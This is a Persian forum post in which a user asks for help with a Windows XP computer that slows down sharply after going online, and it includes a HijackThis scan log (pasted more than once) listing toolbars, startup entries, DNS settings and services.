R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
R3 - URLSearchHook: UrlSearchHook Class - {00000000-6E41-4FD3-8538-502F5495E5FC} - C:\Program Files\Ask.com\GenericAskToolbar.dll
R3 - URLSearchHook: Ashampoo US Toolbar - {124d001a-bdcb-472f-aa59-bbe7e4bc3204} - C:\Program Files\Ashampoo_US\prxtbAsha.dll
R3 - URLSearchHook: Hotspot Shield Toolbar - {c95a4e8e-816d-4655-8c79-d736da1adb6d} - C:\Program Files\Hotspot_Shield\prxtbHot0.dll
O2 - BHO: Ashampoo US - {124d001a-bdcb-472f-aa59-bbe7e4bc3204} - C:\Program Files\Ashampoo_US\prxtbAsha.dll
O2 - BHO: Hotspot Shield - {c95a4e8e-816d-4655-8c79-d736da1adb6d} - C:\Program Files\Hotspot_Shield\prxtbHot0.dll
O2 - BHO: Free Download Manager - {CC59E0F9-7E43-44FA-9FAA-8377850BF205} - D:\portabl\Free Download Manager\iefdm2.dll
O2 - BHO: Ask Toolbar BHO - {D4027C7F-154A-4066-A1AD-4243D8127440} - C:\Program Files\Ask.com\GenericAskToolbar.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Oracle\JavaFX 2.0 Runtime\bin\jp2ssv.dll
O2 - BHO: Hotspot Shield Class - {F9E4A054-E9B1-4BC3-83A3-76A1AE736170} - C:\Program Files\Hotspot Shield\HssIE\HssIE.dll
O3 - Toolbar: PandoraTV Toolbar - {D4027C7F-154A-4066-A1AD-4243D8127440} - C:\Program Files\Ask.com\GenericAskToolbar.dll
O3 - Toolbar: Ashampoo US Toolbar - {124d001a-bdcb-472f-aa59-bbe7e4bc3204} - C:\Program Files\Ashampoo_US\prxtbAsha.dll
O3 - Toolbar: Hotspot Shield Toolbar - {c95a4e8e-816d-4655-8c79-d736da1adb6d} - C:\Program Files\Hotspot_Shield\prxtbHot0.dll
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\system32\NvMcTray.dll,NvTaskbarInit
O4 - HKLM\..\Run: [High Definition Audio Property Page Shortcut] HDAShCut.exe
O4 - HKLM\..\Run: [SoundMAXPnP] C:\Program Files\Analog Devices\Core\smax4pnp.exe
O4 - HKLM\..\Run: [SoundMAX] "C:\Program Files\Analog Devices\SoundMAX\Smax4.exe" /tray
O4 - HKLM\..\Run: [avgnt] "C:\Program Files\Avira\AntiVir Desktop\avgnt.exe" /min
O4 - HKLM\..\Run: [CloneCDTray] "C:\Program Files\SlySoft\CloneCD\CloneCDTray.exe" /s
O4 - HKLM\..\Run: [IMJPMIG8.1] "C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE" /Spoil /RemAdvDef /Migration32
O4 - HKLM\..\Run: [MSPY2002] C:\WINDOWS\system32\IME\PINTLGNT\ImScInst.exe /SYNC
O4 - HKLM\..\Run: [PHIME2002ASync] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE /SYNC
O4 - HKLM\..\Run: [PHIME2002A] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE /IMEName
O4 - HKLM\..\Run: [Samsung Common SM] "C:\WINDOWS\Samsung\ComSMMgr\ssmmgr.exe" /autorun
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Common Files\Java\Java Update\jusched.exe"
O4 - HKLM\..\Run: [NeroFilterCheck] C:\WINDOWS\system32\NeroCheck.exe
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKUS\S-1-5-19\..\RunOnce: [ShowDeskFix] regsvr32 /s /n /i:u shell32 (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\RunOnce: [ShowDeskFix] regsvr32 /s /n /i:u shell32 (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-18\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe (User 'SYSTEM')
O4 - HKUS\S-1-5-18\..\RunOnce: [ShowDeskFix] regsvr32 /s /n /i:u shell32 (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe (User 'Default user')
O4 - HKUS\.DEFAULT\..\RunOnce: [ShowDeskFix] regsvr32 /s /n /i:u shell32 (User 'Default user')
O8 - Extra context menu item: Download all with Free Download Manager - file://D:\portabl\Free Download Manager\dlall.htm
O8 - Extra context menu item: Download selected with Free Download Manager - file://D:\portabl\Free Download Manager\dlselected.htm
O8 - Extra context menu item: Download video with Free Download Manager - file://D:\portabl\Free Download Manager\dlfvideo.htm
O8 - Extra context menu item: Download with Free Download Manager - file://D:\portabl\Free Download Manager\dllink.htm
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O17 - HKLM\System\CCS\Services\Tcpip\..\{9DCE7C59-E3E2-47C0-947C-A3040F1326BB}: NameServer = 4.2.2.4,89.165.0.14
O17 - HKLM\System\CCS\Services\Tcpip\..\{C7458D99-C2D4-47A0-9182-0D8FFF1B7166}: NameServer = 89.165.0.13 89.165.0.14
O22 - SharedTaskScheduler: Browseui preloader - {438755C2-A8BA-11D1-B96B-00A0C90312E1} - C:\WINDOWS\system32\browseui.dll
O22 - SharedTaskScheduler: Component Categories cache daemon - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\WINDOWS\system32\browseui.dll
O23 - Service: Avira AntiVir Scheduler (AntiVirSchedulerService) - Avira GmbH - C:\Program Files\Avira\AntiVir Desktop\sched.exe
O23 - Service: Avira AntiVir Guard (AntiVirService) - Avira GmbH - C:\Program Files\Avira\AntiVir Desktop\avguard.exe
O23 - Service: Hotspot Shield Service (hshld) - Unknown owner - C:\Program Files\Hotspot Shield\bin\openvpnas.exe
O23 - Service: Hotspot Shield Routing Service (HssSrv) - AnchorFree Inc. - C:\Program Files\Hotspot Shield\HssWPR\hsssrv.exe
O23 - Service: Hotspot Shield Tray Service (HssTrayService) - Unknown owner - C:\Program Files\Hotspot Shield\bin\HssTrayService.EXE
O23 - Service: Hotspot Shield Monitoring Service (HssWd) - Unknown owner - C:\Program Files\Hotspot Shield\bin\hsswd.exe
O23 - Service: Java Quick Starter (JavaQuickStarterService) - Oracle Corporation - C:\Program Files\Java\jre7\bin\jqs.exe
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe
O23 - Service: StarWind iSCSI Service (StarWindService) - Rocket Division Software - C:\Program Files\Alcohol Soft (MRT)\Alcohol 120\StarWind\StarWindService.exe
--
End of file - 8578 bytes
([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])
با سلام خدمت دوست عزیزDr.Smith ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) جدیدا کامپیوتر برادرم با مشکلی روبرو شده وقتی ویندوز را عوض می کنی تا زمانی که به اینترنت وصل نشدی سرعت کامپیوتر خوبه همینکه به شبکه وصل میشی سرعت کامپیوتر افت شدیدی میکنه .اینم اسکن سیستم
Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 09:21:03 ب.ظ, on 2012/03/23
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.20583)
Boot mode: Normal
Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Avira\AntiVir Desktop\sched.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\ctfmon.exe
C:\WINDOWS\system32\RUNDLL32.EXE
C:\Program Files\Analog Devices\Core\smax4pnp.exe
C:\Program Files\Analog Devices\SoundMAX\Smax4.exe
C:\Program Files\Avira\AntiVir Desktop\avgnt.exe
C:\Program Files\SlySoft\CloneCD\CloneCDTray.exe
C:\WINDOWS\Samsung\ComSMMgr\ssmmgr.exe
C:\Program Files\Common Files\Java\Java Update\jusched.exe
C:\Program Files\Avira\AntiVir Desktop\avguard.exe
C:\Program Files\Hotspot Shield\bin\openvpnas.exe
C:\Program Files\Avira\AntiVir Desktop\avshadow.exe
C:\Program Files\Hotspot Shield\HssWPR\hsssrv.exe
C:\Program Files\Hotspot Shield\bin\hsswd.exe
C:\Program Files\Java\jre7\bin\jqs.exe
C:\WINDOWS\system32\nvsvc32.exe
C:\Program Files\Alcohol Soft (MRT)\Alcohol 120
\StarWind\StarWindService.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\wscntfy.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Program Files\Hotspot Shield\bin\openvpntray.exe
C:\Program Files\Mozilla Firefox\plugin-container.exe
D:\portabl\Free Download Manager\fdm.exe
c:\progra~1\thekmp~1\kmplayer.exe
D:\HHAMMID\Downloads\Software\HijackThis.exe
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page =
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page =
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL
= [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page =
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
R3 - URLSearchHook: UrlSearchHook Class - {00000000-6E41-4FD3-8538-
502F5495E5FC} - C:\Program Files\Ask.com\GenericAskToolbar.dll
R3 - URLSearchHook: Ashampoo US Toolbar - {124d001a-bdcb-472f-aa59-
bbe7e4bc3204} - C:\Program Files\Ashampoo_US\prxtbAsha.dll
R3 - URLSearchHook: Hotspot Shield Toolbar - {c95a4e8e-816d-4655-8c79-
d736da1adb6d} - C:\Program Files\Hotspot_Shield\prxtbHot0.dll
O2 - BHO: Ashampoo US - {124d001a-bdcb-472f-aa59-bbe7e4bc3204} -
C:\Program Files\Ashampoo_US\prxtbAsha.dll
O2 - BHO: Hotspot Shield - {c95a4e8e-816d-4655-8c79-d736da1adb6d} -
C:\Program Files\Hotspot_Shield\prxtbHot0.dll
O2 - BHO: Free Download Manager - {CC59E0F9-7E43-44FA-9FAA-
8377850BF205} - D:\portabl\Free Download Manager\iefdm2.dll
O2 - BHO: Ask Toolbar BHO - {D4027C7F-154A-4066-A1AD-4243D8127440} -
C:\Program Files\Ask.com\GenericAskToolbar.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-
9C25C1C588A9} - C:\Program Files\Oracle\JavaFX 2.0
Runtime\bin\jp2ssv.dll
O2 - BHO: Hotspot Shield Class - {F9E4A054-E9B1-4BC3-83A3-76A1AE736170}
- C:\Program Files\Hotspot Shield\HssIE\HssIE.dll
O3 - Toolbar: PandoraTV Toolbar - {D4027C7F-154A-4066-A1AD-
4243D8127440} - C:\Program Files\Ask.com\GenericAskToolbar.dll
O3 - Toolbar: Ashampoo US Toolbar - {124d001a-bdcb-472f-aa59-
bbe7e4bc3204} - C:\Program Files\Ashampoo_US\prxtbAsha.dll
O3 - Toolbar: Hotspot Shield Toolbar - {c95a4e8e-816d-4655-8c79-
d736da1adb6d} - C:\Program Files\Hotspot_Shield\prxtbHot0.dll
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32
\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\system32
\NvMcTray.dll,NvTaskbarInit
O4 - HKLM\..\Run: [High Definition Audio Property Page Shortcut]
HDAShCut.exe
O4 - HKLM\..\Run: [SoundMAXPnP] C:\Program Files\Analog
Devices\Core\smax4pnp.exe
O4 - HKLM\..\Run: [SoundMAX] "C:\Program Files\Analog
Devices\SoundMAX\Smax4.exe" /tray
O4 - HKLM\..\Run: [avgnt] "C:\Program Files\Avira\AntiVir
Desktop\avgnt.exe" /min
O4 - HKLM\..\Run: [CloneCDTray] "C:\Program
Files\SlySoft\CloneCD\CloneCDTray.exe" /s
O4 - HKLM\..\Run: [IMJPMIG8.1] "C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE"
/Spoil /RemAdvDef /Migration32
O4 - HKLM\..\Run: [MSPY2002] C:\WINDOWS\system32
\IME\PINTLGNT\ImScInst.exe /SYNC
O4 - HKLM\..\Run: [PHIME2002ASync] C:\WINDOWS\system32
\IME\TINTLGNT\TINTSETP.EXE /SYNC
O4 - HKLM\..\Run: [PHIME2002A] C:\WINDOWS\system32
\IME\TINTLGNT\TINTSETP.EXE /IMEName
O4 - HKLM\..\Run: [Samsung Common SM]
"C:\WINDOWS\Samsung\ComSMMgr\ssmmgr.exe" /autorun
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Common
Files\Java\Java Update\jusched.exe"
O4 - HKLM\..\Run: [NeroFilterCheck] C:\WINDOWS\system32\NeroCheck.exe
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKUS\S-1-5-19\..\RunOnce: [ShowDeskFix] regsvr32 /s /n /i:u
shell32 (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\RunOnce: [ShowDeskFix] regsvr32 /s /n /i:u
shell32 (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-18\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
(User 'SYSTEM')
O4 - HKUS\S-1-5-18\..\RunOnce: [ShowDeskFix] regsvr32 /s /n /i:u
shell32 (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
(User 'Default user')
O4 - HKUS\.DEFAULT\..\RunOnce: [ShowDeskFix] regsvr32 /s /n /i:u
shell32 (User 'Default user')
O8 - Extra context menu item: Download all with Free Download Manager -
file://D:\portabl\Free Download Manager\dlall.htm
O8 - Extra context menu item: Download selected with Free Download
Manager - file://D:\portabl\Free Download Manager\dlselected.htm
O8 - Extra context menu item: Download video with Free Download Manager
- file://D:\portabl\Free Download Manager\dlfvideo.htm
O8 - Extra context menu item: Download with Free Download Manager -
file://D:\portabl\Free Download Manager\dllink.htm
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} -
C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-
4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} -
C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-
BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O17 - HKLM\System\CCS\Services\Tcpip\..\{9DCE7C59-E3E2-47C0-947C-
A3040F1326BB}: NameServer = 4.2.2.4,89.165.0.14
O17 - HKLM\System\CCS\Services\Tcpip\..\{C7458D99-C2D4-47A0-9182-
0D8FFF1B7166}: NameServer = 89.165.0.13 89.165.0.14
O22 - SharedTaskScheduler: Browseui preloader - {438755C2-A8BA-11D1-
B96B-00A0C90312E1} - C:\WINDOWS\system32\browseui.dll
O22 - SharedTaskScheduler: Component Categories cache daemon -
{8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\WINDOWS\system32
\browseui.dll
O23 - Service: Avira AntiVir Scheduler (AntiVirSchedulerService) -
Avira GmbH - C:\Program Files\Avira\AntiVir Desktop\sched.exe
O23 - Service: Avira AntiVir Guard (AntiVirService) - Avira GmbH -
C:\Program Files\Avira\AntiVir Desktop\avguard.exe
O23 - Service: Hotspot Shield Service (hshld) - Unknown owner -
C:\Program Files\Hotspot Shield\bin\openvpnas.exe
O23 - Service: Hotspot Shield Routing Service (HssSrv) - AnchorFree
Inc. - C:\Program Files\Hotspot Shield\HssWPR\hsssrv.exe
O23 - Service: Hotspot Shield Tray Service (HssTrayService) - Unknown
owner - C:\Program Files\Hotspot Shield\bin\HssTrayService.EXE
O23 - Service: Hotspot Shield Monitoring Service (HssWd) - Unknown
owner - C:\Program Files\Hotspot Shield\bin\hsswd.exe
O23 - Service: Java Quick Starter (JavaQuickStarterService) - Oracle
Corporation - C:\Program Files\Java\jre7\bin\jqs.exe
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA
Corporation - C:\WINDOWS\system32\nvsvc32.exe
O23 - Service: StarWind iSCSI Service (StarWindService) - Rocket
Division Software - C:\Program Files\Alcohol Soft (MRT)\Alcohol 120
\StarWind\StarWindService.exe
--
End of file - 8522 bytes
vBulletin , Copyright ©2000-2025, Jelsoft Enterprises Ltd.